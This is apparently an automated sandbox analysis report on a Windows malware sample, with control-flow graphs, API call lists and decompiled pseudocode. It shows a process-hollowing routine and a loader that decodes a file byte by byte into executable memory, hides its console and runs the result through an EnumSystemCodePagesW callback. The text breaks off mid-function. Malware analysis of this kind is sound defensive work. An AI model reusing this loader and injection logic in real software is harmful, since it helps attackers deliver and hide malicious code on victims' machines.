                                                  • Opcode Fuzzy Hash: 9350dc32ad85247776eb7766d296cb9668ab8607546fc5f0d0b9a7cb4b47a0c2
                                                  • Instruction Fuzzy Hash: BA621874904208DFDB14CFA8C884BEEBBB1FF45308F2480AAD5056B392D7796E85DB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 194 b814be-b81591 call b80005 call b800e4 * 7 call b80019 CreateFileW 213 b81673 194->213 214 b81597-b815a2 194->214 216 b81677-b8167f 213->216 217 b815a8-b815b8 VirtualAlloc 214->217 218 b8166f-b81671 214->218 222 b81699-b8169d 216->222 217->218 219 b815be-b815cd ReadFile 217->219 218->213 218->216 219->218 221 b815d3-b815f4 VirtualAlloc 219->221 225 b8166c 221->225 226 b815f6-b81609 call b800b5 221->226 223 b8169f-b816a4 222->223 224 b81681-b81686 222->224 227 b816b1-b816b7 223->227 228 b816a6-b816ae VirtualFree 223->228 230 b81688-b8168d 224->230 231 b8168f-b81691 224->231 225->218 235 b8160b-b81614 226->235 236 b81642-b81652 call b800e4 226->236 228->227 230->222 232 b81693-b81695 231->232 233 b81697 231->233 232->222 233->222 238 b81617-b81640 call b800b5 235->238 236->225 241 b81654-b81659 236->241 238->236 243 b8165b-b8165c FindCloseChangeNotification 241->243 244 b8165f-b8166a VirtualFree 241->244 243->244 244->222
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,00000000,7F91A078,00000000,7F951704,00000000,7FE1F1FB,00000000,7FE7F840,00000000), ref: 00B81587
                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00B816D6,7FAB7E30,00B80FA5,00000000,00000040), ref: 00B815B1
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,7FAB7E30,00000000,?,?,?,?,?,?,?,00B816D6,7FAB7E30,00B80FA5,00000000), ref: 00B815C8
                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,00B816D6,7FAB7E30,00B80FA5,00000000,00000040), ref: 00B815EC
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,00B80B9A,00000000,?,?,?,?,?,?,?,00B816D6,7FAB7E30,00B80FA5,00000000,00000040,?), ref: 00B8165C
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00B80B9A,00000000,?,?,?,?,?,?,?,00B816D6,7FAB7E30,00B80FA5,00000000), ref: 00B81667
                                                  • VirtualFree.KERNELBASE(00B80B9A,00000000,00008000,?,?,?,?,?,?,?,00B816D6,7FAB7E30,00B80FA5,00000000,00000040,?), ref: 00B816AE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                  • String ID:
                                                  • API String ID: 656311269-0
                                                  • Opcode ID: bdf57d96a7a8095ddb91817cfd017043a9e57b958dd1ec16a9ec4e4f7a634f08
                                                  • Instruction ID: 54f9215311417cf7c857b2055f02cbf630179877c6c0ee56198348b693971c95
                                                  • Opcode Fuzzy Hash: bdf57d96a7a8095ddb91817cfd017043a9e57b958dd1ec16a9ec4e4f7a634f08
                                                  • Instruction Fuzzy Hash: 79518071E01218ABDB10AFA8CC85FAEB7B9EF15714F14499AF940FB290E7749901CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 245 b8091e-b80931 246 b80934-b80938 245->246 247 b8093a-b8094e 246->247 248 b80950-b8095d 246->248 247->246 249 b80960-b80964 248->249 250 b8097c-b80989 249->250 251 b80966-b8097a 249->251 252 b8098c-b80990 250->252 251->249 253 b809a8-b80a8e call b80005 call b800e4 * 8 252->253 254 b80992-b809a6 252->254 273 b80a90-b80a9a 253->273 274 b80aa5 253->274 254->252 273->274 275 b80a9c-b80aa3 273->275 276 b80aa9-b80ac5 274->276 275->276 278 b80ace 276->278 279 b80ac7-b80ac9 276->279 281 b80ad5-b80aff CreateProcessW 278->281 280 b80e4d-b80e4e 279->280 283 b80b01 281->283 284 b80b06-b80b22 GetThreadContext 281->284 285 b80e01-b80e05 283->285 286 b80b29-b80b46 ReadProcessMemory 284->286 287 b80b24 284->287 290 b80e4a-b80e4c 285->290 291 b80e07-b80e0b 285->291 288 b80b48 286->288 289 b80b4d-b80b56 286->289 287->285 288->285 292 b80b58-b80b67 289->292 293 b80b7d-b80b9c call b80e97 289->293 290->280 294 b80e0d-b80e18 291->294 295 b80e1e-b80e22 291->295 292->293 296 b80b69-b80b6f call b811f6 292->296 308 b80b9e 293->308 309 b80ba3-b80bc4 call b80faf 293->309 294->295 298 b80e2a-b80e2e 295->298 299 b80e24 295->299 307 b80b74-b80b76 296->307 300 b80e30 298->300 301 b80e36-b80e3a 298->301 299->298 300->301 305 b80e3c-b80e41 call b811f6 301->305 306 b80e46-b80e48 301->306 305->306 306->280 307->293 311 b80b78 307->311 308->285 314 b80c09-b80c29 call b80faf 309->314 315 b80bc6-b80bcd 309->315 311->285 322 b80c2b 314->322 323 b80c30-b80c45 call b800b5 314->323 316 b80bcf-b80bfb call b80faf 315->316 317 b80c04 315->317 324 b80bfd 316->324 325 b80c02 316->325 317->285 322->285 328 b80c4e-b80c58 323->328 324->285 325->314 329 b80c8a-b80c8e 328->329 330 b80c5a-b80c88 call b800b5 328->330 332 b80d6e-b80d8a call b81289 329->332 333 b80c94-b80ca2 329->333 330->328 340 b80d8c 332->340 341 b80d8e-b80daf SetThreadContext 332->341 333->332 336 b80ca8-b80cb6 333->336 336->332 339 b80cbc-b80cdc 336->339 342 b80cdf-b80ce3 
339->342 340->285 343 b80db1 341->343 344 b80db3-b80dbd call b81147 341->344 342->332 345 b80ce9-b80cfe 342->345 343->285 351 b80dbf 344->351 352 b80dc1-b80dc5 344->352 347 b80d10-b80d14 345->347 349 b80d51-b80d69 347->349 350 b80d16-b80d22 347->350 349->342 353 b80d4f 350->353 354 b80d24-b80d4d 350->354 351->285 355 b80dcd-b80dd1 352->355 356 b80dc7 352->356 353->347 354->353 358 b80dd9-b80ddd 355->358 359 b80dd3 355->359 356->355 360 b80ddf 358->360 361 b80de5-b80de9 358->361 359->358 360->361 362 b80deb-b80df0 call b811f6 361->362 363 b80df5-b80dfb 361->363 362->363 363->281 363->285
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00B80AFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: D
                                                  • API String ID: 963392458-2746444292
                                                  • Opcode ID: b07659f93890cc848999820ed0069d9183faa54d6d5d02b225e023f43755ab63
                                                  • Instruction ID: 11cf940c248c8aa0f5697d02fae58a56a2d62019a8949fbd19bfe42512503083
                                                  • Opcode Fuzzy Hash: b07659f93890cc848999820ed0069d9183faa54d6d5d02b225e023f43755ab63
                                                  • Instruction Fuzzy Hash: B302E170D20209EFDB54EF94C985BADBBF5FF04345F2040A9E515BA2A1D774AA88DF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 365 4117a7-4117ac 366 4117ae-4117c6 365->366 367 4117d4-4117dd 366->367 368 4117c8-4117cc 366->368 369 4117ef 367->369 370 4117df-4117e2 367->370 368->367 371 4117ce-4117d2 368->371 375 4117f1-4117fe GetStdHandle 369->375 373 4117e4-4117e9 370->373 374 4117eb-4117ed 370->374 372 41184d-411851 371->372 372->366 376 411857-41185a 372->376 373->375 374->375 377 411800-411802 375->377 378 41180d 375->378 377->378 379 411804-41180b GetFileType 377->379 380 41180f-411811 378->380 379->380 381 411813-41181c 380->381 382 41182f-411841 380->382 383 411824-411827 381->383 384 41181e-411822 381->384 382->372 385 411843-411846 382->385 383->372 386 411829-41182d 383->386 384->372 385->372 386->372
                                                  C-Code - Quality: 84%
                                                  			E004117A7() {
                                                  				signed int _t20;
                                                  				signed int _t22;
                                                  				long _t23;
                                                  				signed char _t25;
                                                  				void* _t28;
                                                  				signed int _t31;
                                                  				void* _t33;
                                                  
                                                  				_t31 = 0;
                                                  				do {
                                                  					_t20 = _t31 & 0x0000003f;
                                                  					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x4217e8 + (_t31 >> 6) * 4));
                                                  					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
                                                  						 *(_t33 + 0x28) = 0x81;
                                                  						_t22 = _t31;
                                                  						if(_t22 == 0) {
                                                  							_push(0xfffffff6);
                                                  						} else {
                                                  							if(_t22 == 1) {
                                                  								_push(0xfffffff5);
                                                  							} else {
                                                  								_push(0xfffffff4);
                                                  							}
                                                  						}
                                                  						_pop(_t23);
                                                  						_t28 = GetStdHandle(_t23);
                                                  						if(_t28 == 0xffffffff || _t28 == 0) {
                                                  							_t25 = 0;
                                                  						} else {
                                                  							_t25 = GetFileType(_t28); // executed
                                                  						}
                                                  						if(_t25 == 0) {
                                                  							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                                                  							 *(_t33 + 0x18) = 0xfffffffe;
                                                  							_t20 =  *0x421aec; // 0x57fdd8
                                                  							if(_t20 != 0) {
                                                  								_t20 =  *(_t20 + _t31 * 4);
                                                  								 *(_t20 + 0x10) = 0xfffffffe;
                                                  							}
                                                  						} else {
                                                  							_t20 = _t25 & 0x000000ff;
                                                  							 *(_t33 + 0x18) = _t28;
                                                  							if(_t20 != 2) {
                                                  								if(_t20 == 3) {
                                                  									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
                                                  								}
                                                  							} else {
                                                  								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
                                                  					}
                                                  					_t31 = _t31 + 1;
                                                  				} while (_t31 != 3);
                                                  				return _t20;
                                                  			}

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 004117F3
                                                  • GetFileType.KERNELBASE(00000000), ref: 00411805
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID:
                                                  • API String ID: 3000768030-0
                                                  • Opcode ID: bf012132e648b38d15b19865d44f8fee2aab9814c3c2c215d4ecae7c09de6ce5
                                                  • Instruction ID: a3664b0028b3f5ce1eaa5c130127368b884a826e018fd639eec931c8e0f35f93
                                                  • Opcode Fuzzy Hash: bf012132e648b38d15b19865d44f8fee2aab9814c3c2c215d4ecae7c09de6ce5
                                                  • Instruction Fuzzy Hash: 7111EB3160471186CB305F3ECCC86A77A95A766330B34071BD2B686BF1C738C8C6D259
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  [Control-flow graph of the function at 409702; node and edge listing not reproduced. API calls on the graph: GetConsoleWindow, ShowWindow, CreateFileW, GetFileSize, VirtualAlloc, ReadFile, EnumSystemCodePagesW, GetOEMCP, GetStdHandle, GetStartupInfoW.]
                                                  C-Code - Quality: 82%
                                                  			E00409702(void* __eax, intOrPtr* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, int _a12, int _a20, int _a24, int _a36) {
                                                  				signed int _v8;
                                                  				void* _v12;
                                                  				signed short* _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				intOrPtr* _v28;
                                                  				intOrPtr _v32;
                                                  				signed int _v36;
                                                  				char* _v40;
                                                  				char* _v44;
                                                  				signed int _v48;
                                                  				char* _v52;
                                                  				signed int _v56;
                                                  				char* _v60;
                                                  				signed int _v64;
                                                  				signed int _v68;
                                                  				char* _v72;
                                                  				signed int _v76;
                                                  				char* _v80;
                                                  				short _v82;
                                                  				short _v84;
                                                  				short _v86;
                                                  				short _v88;
                                                  				short _v90;
                                                  				short _v92;
                                                  				short _v94;
                                                  				short _v96;
                                                  				short _v98;
                                                  				short _v100;
                                                  				short _v102;
                                                  				short _v104;
                                                  				short _v106;
                                                  				int _v108;
                                                  				long _v112;
                                                  				signed int _v116;
                                                  				void* _v120;
                                                  				int _v124;
                                                  				int _v128;
                                                  				int _v132;
                                                  				int _v136;
                                                  				int _v140;
                                                  				int _v144;
                                                  				int _v148;
                                                  				intOrPtr _v152;
                                                  				signed int _v156;
                                                  				signed int _v160;
                                                  				signed int _v164;
                                                  				signed int _v168;
                                                  				signed int _v172;
                                                  				signed int _v176;
                                                  				signed int _v180;
                                                  				signed int _v184;
                                                  				long _v192;
                                                  				struct _STARTUPINFOW _v260;
                                                  				struct HWND__* _t347;
                                                  				int _t349;
                                                  				void* _t353;
                                                  				void* _t355;
                                                  				signed int _t404;
                                                  				signed int _t406;
                                                  				long _t414;
                                                  				signed int _t419;
                                                  				short _t421;
                                                  				signed int _t426;
                                                  				signed int _t427;
                                                  				short _t431;
                                                  				signed int _t434;
                                                  				signed int _t435;
                                                  				signed int _t438;
                                                  				signed int _t441;
                                                  				intOrPtr _t444;
                                                  				short _t445;
                                                  				signed int _t449;
                                                  				signed int _t454;
                                                  				short _t457;
                                                  				intOrPtr _t506;
                                                  				signed int _t516;
                                                  				signed int _t517;
                                                  				short _t519;
                                                  				signed int _t522;
                                                  				signed int _t523;
                                                  				short _t527;
                                                  				short _t531;
                                                  				short _t542;
                                                  				intOrPtr _t588;
                                                  				signed int _t591;
                                                  				struct HWND__* _t597;
                                                  				signed int _t599;
                                                  				signed int _t600;
                                                  				short _t602;
                                                  				short _t607;
                                                  				signed int _t610;
                                                  				signed int _t611;
                                                  				short _t624;
                                                  				short _t630;
                                                  				signed int _t632;
                                                  				void* _t634;
                                                  				void* _t637;
                                                  				void* _t639;
                                                  				void* _t640;
                                                  				void* _t641;
                                                  				void* _t642;
                                                  
                                                  				_t633 = __edi;
                                                  				_pop(es);
                                                  				_pop(es);
                                                  				_pop(es);
                                                  				_pop(es);
                                                  				_pop(es);
                                                  				_pop(es);
                                                  				_pop(es);
                                                  				_pop(es);
                                                  				_pop(es);
                                                  				_pop(es);
                                                  				_pop(es);
                                                  				_pop(es);
                                                  				_pop(es);
                                                  				_t347 = __eax +  *__ebx + 5;
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				_v72 = 0;
                                                  				_a20 = 0;
                                                  				_a24 = 0;
                                                  				_v108 = 0;
                                                  				_v144 = 0;
                                                  				_a36 = 0;
                                                  				_a12 = 0;
                                                  				__imp__GetConsoleWindow(_t634, es, es); // executed
                                                  				ShowWindow(_t347, 0); // executed
                                                  				_push(0x3d0900); // executed
                                                  				_t349 = E0040DC06(); // executed
                                                  				_t639 = _t637 - 0x100 + 4;
                                                  				_a12 = _t349;
                                                  				if(_a12 != 0) {
                                                  					E0040D210(__edi, _v32, 0x54, 0x3d0900);
                                                  					_t640 = _t639 + 0xc;
                                                  					__eflags = 4;
                                                  					_t353 = CreateFileW( *(_a8 + (4 << 0)), 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                  					_v120 = _t353;
                                                  					_v112 = GetFileSize(_v120, 0);
                                                  					_t355 = VirtualAlloc(0, _v112, 0x3000, 0x40); // executed
                                                  					_v12 = _t355;
                                                  					ReadFile(_v120, _v12, _v112,  &_v192, 0); // executed
                                                  					while(1) {
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x000000a5;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 0x68;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 0x6f;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 0x28;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 0xc6;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 0xf5;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 0xf8;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x0000002e;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) + 0x56;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x0000006d;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) - 0x50;
                                                  						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x00000097;
                                                  						_v8 = _v8 + 1;
                                                  						__eflags = _v8 - _v112;
                                                  						if(_v8 >= _v112) {
                                                  							break;
                                                  						}
                                                  					}
                                                  					EnumSystemCodePagesW(_v12, 0); // executed
                                                  					E0040DBEB(_v32);
                                                  					_t641 = _t640 + 4;
                                                  					_v8 = 0;
                                                  					while(1) {
                                                  						__eflags = _v8 - _a4;
                                                  						if(_v8 >= _a4) {
                                                  							break;
                                                  						}
                                                  						 *0x41feac = 0x1f7;
                                                  						_t632 = _v8 + 1;
                                                  						__eflags = _t632;
                                                  						_v8 = _t632;
                                                  					}
                                                  					 *0x41ff4c = GetOEMCP();
                                                  					_t506 =  *0x41ff4c; // 0x0
                                                  					 *0x41ff48 = _t506;
                                                  					 *0x41ff38 = 0x32;
                                                  					_push(4);
                                                  					_t588 =  *0x41ff38; // 0x0
                                                  					_push(_t588);
                                                  					_t404 = E0040DBE0();
                                                  					_t642 = _t641 + 8;
                                                  					 *0x41ff34 = _t404;
                                                  					__eflags =  *0x41ff34;
                                                  					if( *0x41ff34 != 0) {
                                                  						_v8 = 1;
                                                  						while(1) {
                                                  							L14:
                                                  							__eflags = _v8 - _a4;
                                                  							if(_v8 >= _a4) {
                                                  								break;
                                                  							}
                                                  							_v44 = L"--headless";
                                                  							_v36 =  *((intOrPtr*)(_a8 + _v8 * 4));
                                                  							while(1) {
                                                  								_t599 = _v36;
                                                  								_t421 =  *_t599;
                                                  								_v100 = _t421;
                                                  								__eflags = _t421 -  *_v44;
                                                  								if(_t421 !=  *_v44) {
                                                  									break;
                                                  								}
                                                  								__eflags = _v100;
                                                  								if(_v100 == 0) {
                                                  									L20:
                                                  									_v124 = 0;
                                                  								} else {
                                                  									_t599 = _v36;
                                                  									_t457 =  *((intOrPtr*)(_t599 + 2));
                                                  									_v102 = _t457;
                                                  									_t132 =  &(_v44[2]); // 0x68002d
                                                  									__eflags = _t457 -  *_t132;
                                                  									if(_t457 !=  *_t132) {
                                                  										break;
                                                  									} else {
                                                  										_v36 = _v36 + 4;
                                                  										_v44 =  &(_v44[4]);
                                                  										__eflags = _v102;
                                                  										if(_v102 != 0) {
                                                  											continue;
                                                  										} else {
                                                  											goto L20;
                                                  										}
                                                  									}
                                                  								}
                                                  								L22:
                                                  								_v156 = _v124;
                                                  								__eflags = _v156;
                                                  								if(_v156 != 0) {
                                                  									_v52 = L"--unix";
                                                  									_v48 =  *((intOrPtr*)(_a8 + _v8 * 4));
                                                  									while(1) {
                                                  										_t516 = _v48;
                                                  										_t602 =  *_t516;
                                                  										_v104 = _t602;
                                                  										__eflags = _t602 -  *_v52;
                                                  										if(_t602 !=  *_v52) {
                                                  											break;
                                                  										}
                                                  										__eflags = _v104;
                                                  										if(_v104 == 0) {
                                                  											L29:
                                                  											_v128 = 0;
                                                  										} else {
                                                  											_t516 = _v48;
                                                  											_t630 =  *((intOrPtr*)(_t516 + 2));
                                                  											_v106 = _t630;
                                                  											_t158 =  &(_v52[2]); // 0x75002d
                                                  											__eflags = _t630 -  *_t158;
                                                  											if(_t630 !=  *_t158) {
                                                  												break;
                                                  											} else {
                                                  												_v48 = _v48 + 4;
                                                  												_v52 =  &(_v52[4]);
                                                  												__eflags = _v106;
                                                  												if(_v106 != 0) {
                                                  													continue;
                                                  												} else {
                                                  													goto L29;
                                                  												}
                                                  											}
                                                  										}
                                                  										L31:
                                                  										_v160 = _v128;
                                                  										__eflags = _v160;
                                                  										if(_v160 != 0) {
                                                  											_v60 = L"--width";
                                                  											_v56 =  *((intOrPtr*)(_a8 + _v8 * 4));
                                                  											while(1) {
                                                  												_t426 = _v56;
                                                  												_t519 =  *_t426;
                                                  												_v82 = _t519;
                                                  												__eflags = _t519 -  *_v60;
                                                  												if(_t519 !=  *_v60) {
                                                  													break;
                                                  												}
                                                  												__eflags = _v82;
                                                  												if(_v82 == 0) {
                                                  													L38:
                                                  													_v132 = 0;
                                                  												} else {
                                                  													_t426 = _v56;
                                                  													_t542 =  *((intOrPtr*)(_t426 + 2));
                                                  													_v84 = _t542;
                                                  													_t184 =  &(_v60[2]); // 0x77002d
                                                  													__eflags = _t542 -  *_t184;
                                                  													if(_t542 !=  *_t184) {
                                                  														break;
                                                  													} else {
                                                  														_v56 = _v56 + 4;
                                                  														_v60 =  &(_v60[4]);
                                                  														__eflags = _v84;
                                                  														if(_v84 != 0) {
                                                  															continue;
                                                  														} else {
                                                  															goto L38;
                                                  														}
                                                  													}
                                                  												}
                                                  												L40:
                                                  												_v164 = _v132;
                                                  												__eflags = _v164;
                                                  												if(_v164 != 0) {
                                                  													_v40 = L"--height";
                                                  													_v64 =  *((intOrPtr*)(_a8 + _v8 * 4));
                                                  													while(1) {
                                                  														_t522 = _v64;
                                                  														_t607 =  *_t522;
                                                  														_v98 = _t607;
                                                  														__eflags = _t607 -  *_v40;
                                                  														if(_t607 !=  *_v40) {
                                                  															break;
                                                  														}
                                                  														__eflags = _v98;
                                                  														if(_v98 == 0) {
                                                  															L54:
                                                  															_v136 = 0;
                                                  														} else {
                                                  															_t522 = _v64;
                                                  															_t624 =  *((intOrPtr*)(_t522 + 2));
                                                  															_v86 = _t624;
                                                  															_t222 =  &(_v40[2]); // 0x68002d
                                                  															__eflags = _t624 -  *_t222;
                                                  															if(_t624 !=  *_t222) {
                                                  																break;
                                                  															} else {
                                                  																_v64 = _v64 + 4;
                                                  																_v40 =  &(_v40[4]);
                                                  																__eflags = _v86;
                                                  																if(_v86 != 0) {
                                                  																	continue;
                                                  																} else {
                                                  																	goto L54;
                                                  																}
                                                  															}
                                                  														}
                                                  														L56:
                                                  														_v168 = _v136;
                                                  														__eflags = _v168;
                                                  														if(_v168 != 0) {
                                                  															_v72 = L"--signal";
                                                  															_v68 =  *((intOrPtr*)(_a8 + _v8 * 4));
                                                  															while(1) {
                                                  																_t610 = _v68;
                                                  																_t431 =  *_t610;
                                                  																_v88 = _t431;
                                                  																__eflags = _t431 -  *_v72;
                                                  																if(_t431 !=  *_v72) {
                                                  																	break;
                                                  																}
                                                  																__eflags = _v88;
                                                  																if(_v88 == 0) {
                                                  																	L70:
                                                  																	_v140 = 0;
                                                  																} else {
                                                  																	_t610 = _v68;
                                                  																	_t445 =  *((intOrPtr*)(_t610 + 2));
                                                  																	_v90 = _t445;
                                                  																	_t260 =  &(_v72[2]); // 0x73002d
                                                  																	__eflags = _t445 -  *_t260;
                                                  																	if(_t445 !=  *_t260) {
                                                  																		break;
                                                  																	} else {
                                                  																		_v68 = _v68 + 4;
                                                  																		_v72 =  &(_v72[4]);
                                                  																		__eflags = _v90;
                                                  																		if(_v90 != 0) {
                                                  																			continue;
                                                  																		} else {
                                                  																			goto L70;
                                                  																		}
                                                  																	}
                                                  																}
                                                  																L72:
                                                  																_v172 = _v140;
                                                  																__eflags = _v172;
                                                  																if(_v172 != 0) {
                                                  																	_v80 = L"--server";
                                                  																	_v76 =  *((intOrPtr*)(_a8 + _v8 * 4));
                                                  																	while(1) {
                                                  																		_t434 = _v76;
                                                  																		_t527 =  *_t434;
                                                  																		_v92 = _t527;
                                                  																		__eflags = _t527 -  *_v80;
                                                  																		if(_t527 !=  *_v80) {
                                                  																			break;
                                                  																		}
                                                  																		__eflags = _v92;
                                                  																		if(_v92 == 0) {
                                                  																			L83:
                                                  																			_v144 = 0;
                                                  																		} else {
                                                  																			_t434 = _v76;
                                                  																			_t531 =  *((intOrPtr*)(_t434 + 2));
                                                  																			_v94 = _t531;
                                                  																			_t296 =  &(_v80[2]); // 0x73002d
                                                  																			__eflags = _t531 -  *_t296;
                                                  																			if(_t531 !=  *_t296) {
                                                  																				break;
                                                  																			} else {
                                                  																				_v76 = _v76 + 4;
                                                  																				_v80 =  &(_v80[4]);
                                                  																				__eflags = _v94;
                                                  																				if(_v94 != 0) {
                                                  																					continue;
                                                  																				} else {
                                                  																					goto L83;
                                                  																				}
                                                  																			}
                                                  																		}
                                                  																		L85:
                                                  																		_v176 = _v144;
                                                  																		__eflags = _v176;
                                                  																		if(_v176 != 0) {
                                                  																			_t414 = 1;
                                                  																		} else {
                                                  																			_v8 = _v8 + 1;
                                                  																			__eflags = _v8 - _a4;
                                                  																			if(_v8 != _a4) {
                                                  																				_t438 = E0040E35E( *((intOrPtr*)(_a8 + _v8 * 4)),  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
                                                  																				_t642 = _t642 + 0xc;
                                                  																				 *0x41fea8 = _t438;
                                                  																				__eflags =  *_v16 & 0x0000ffff;
                                                  																				if(( *_v16 & 0x0000ffff) == 0) {
                                                  																					goto L13;
                                                  																				} else {
                                                  																					_t414 = 1;
                                                  																				}
                                                  																			} else {
                                                  																				_t414 = 1;
                                                  																			}
                                                  																		}
                                                  																		goto L118;
                                                  																	}
                                                  																	asm("sbb eax, eax");
                                                  																	_t435 = _t434 | 0x00000001;
                                                  																	__eflags = _t435;
                                                  																	_v144 = _t435;
                                                  																	goto L85;
                                                  																} else {
                                                  																	_v8 = _v8 + 1;
                                                  																	__eflags = _v8 - _a4;
                                                  																	if(_v8 != _a4) {
                                                  																		_t444 = E0040E35E(_v8,  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
                                                  																		_t642 = _t642 + 0xc;
                                                  																		_v152 = _t444;
                                                  																		__eflags =  *_v16 & 0x0000ffff;
                                                  																		if(( *_v16 & 0x0000ffff) == 0) {
                                                  																			goto L13;
                                                  																		} else {
                                                  																			_t414 = 1;
                                                  																		}
                                                  																	} else {
                                                  																		_t414 = 1;
                                                  																	}
                                                  																}
                                                  																goto L118;
                                                  															}
                                                  															asm("sbb edx, edx");
                                                  															_t611 = _t610 | 0x00000001;
                                                  															__eflags = _t611;
                                                  															_v140 = _t611;
                                                  															goto L72;
                                                  														} else {
                                                  															_v8 = _v8 + 1;
                                                  															__eflags = _v8 - _a4;
                                                  															if(_v8 != _a4) {
                                                  																_t449 = E0040E35E(_a8,  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
                                                  																_t642 = _t642 + 0xc;
                                                  																_v20 = _t449;
                                                  																__eflags = _v20;
                                                  																if(_v20 != 0) {
                                                  																	L61:
                                                  																	__eflags = _v20 - 0xffff;
                                                  																	if(_v20 > 0xffff) {
                                                  																		goto L63;
                                                  																	} else {
                                                  																		__eflags =  *_v16 & 0x0000ffff;
                                                  																		if(( *_v16 & 0x0000ffff) == 0) {
                                                  																			goto L13;
                                                  																		} else {
                                                  																			goto L63;
                                                  																		}
                                                  																	}
                                                  																} else {
                                                  																	__eflags =  *0x41feb4;
                                                  																	if( *0x41feb4 == 0) {
                                                  																		L63:
                                                  																		_t414 = 1;
                                                  																	} else {
                                                  																		goto L61;
                                                  																	}
                                                  																}
                                                  															} else {
                                                  																_t414 = 1;
                                                  															}
                                                  														}
                                                  														goto L118;
                                                  													}
                                                  													asm("sbb ecx, ecx");
                                                  													_t523 = _t522 | 0x00000001;
                                                  													__eflags = _t523;
                                                  													_v136 = _t523;
                                                  													goto L56;
                                                  												} else {
                                                  													_v8 = _v8 + 1;
                                                  													__eflags = _v8 - _a4;
                                                  													if(_v8 != _a4) {
                                                  														_t454 = E0040E35E( *((intOrPtr*)(_a8 + _v8 * 4)),  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
                                                  														_t642 = _t642 + 0xc;
                                                  														_v24 = _t454;
                                                  														__eflags = _v24;
                                                  														if(_v24 != 0) {
